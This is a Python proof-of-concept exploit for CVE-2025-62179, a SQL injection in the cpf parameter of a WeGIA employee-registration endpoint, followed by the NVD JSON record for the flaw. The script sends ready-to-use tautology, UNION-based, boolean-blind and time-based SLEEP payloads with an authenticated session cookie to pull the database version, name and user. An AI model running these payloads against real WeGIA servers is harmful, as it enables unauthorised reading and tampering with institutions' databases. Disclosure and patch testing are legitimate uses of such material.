CVE-2025-62179

# CVE-2025-62179 - WeGIA SQL Injection PoC # Target: /html/funcionario/cadastro_funcionario_pessoa_existente.php # Vulnerable Parameter: cpf import requests TARGET_URL = "http://target-wegia-server" ENDPOINT = "/html/funcionario/cadastro_funcionario_pessoa_existente.php" COOKIES = {"PHPSESSID": "authenticated_session_cookie"} # Low privilege session required # Basic SQL Injection payload to test the vulnerability def test_sql_injection(): """Test for SQL injection in the cpf parameter""" payload = "' OR '1'='1" params = {"cpf": payload} response = requests.get( f"{TARGET_URL}{ENDPOINT}", params=params, cookies=COOKIES ) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") print(f"[+] Response Body (first 500 chars): {response.text[:500]}") return response # UNION-based SQL Injection to extract database version def extract_db_info(): """Extract database information using UNION-based injection""" payload = "' UNION SELECT 1,version(),database(),user(),5,6,7,8,9,10-- -" params = {"cpf": payload} response = requests.get( f"{TARGET_URL}{ENDPOINT}", params=params, cookies=COOKIES ) print(f"[+] Database Info Extraction Response: {response.text[:1000]}") return response # Boolean-based Blind SQL Injection to enumerate tables def blind_injection_test(): """Boolean-based blind injection to test data extraction""" # Test if the database name starts with 'w' payload = "' AND (SELECT SUBSTRING(database(),1,1))='w'-- -" params = {"cpf": payload} response = requests.get( f"{TARGET_URL}{ENDPOINT}", params=params, cookies=COOKIES ) print(f"[+] Blind Injection Test Response: {response.text[:500]}") return response # Time-based Blind SQL Injection def time_based_injection(): """Time-based blind injection for confirmation""" payload = "' OR SLEEP(5)-- -" params = {"cpf": payload} response = requests.get( f"{TARGET_URL}{ENDPOINT}", params=params, cookies=COOKIES ) print(f"[+] Time-based injection response time: {response.elapsed.total_seconds()}s") return response if __name__ == "__main__": print("[*] Testing CVE-2025-62179 - WeGIA SQL Injection") print("[*] Target endpoint:", ENDPOINT) print("-" * 60) test_sql_injection() print("-" * 60) extract_db_info() print("-" * 60) blind_injection_test() print("-" * 60) time_based_injection()

{"cve": {"id": "CVE-2025-62179", "sourceIdentifier": "[email protected]", "published": "2025-10-13T22:15:32.730", "lastModified": "2025-10-20T16:01:53.197", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeGIA is an open source Web Manager for Institutions with a focus on Portuguese language users. Prior to 3.5.1, a SQL Injection vulnerability was identified in the /html/funcionario/cadastro_funcionario_pessoa_existente.php endpoint, specifically in the cpf parameter. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database. This vulnerability is fixed in 3.5.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.5.1", "matchCriteriaId": "0380F435-A37D-48F3-87E5-A2648574EDC0"}]}]}], "references": [{"url": "https://github.com/LabRedesCefetRJ/WeGIA/commit/885972c55c3a06b5275120e88bb1113754a63b26", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-x36x-x5j4-wfjf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}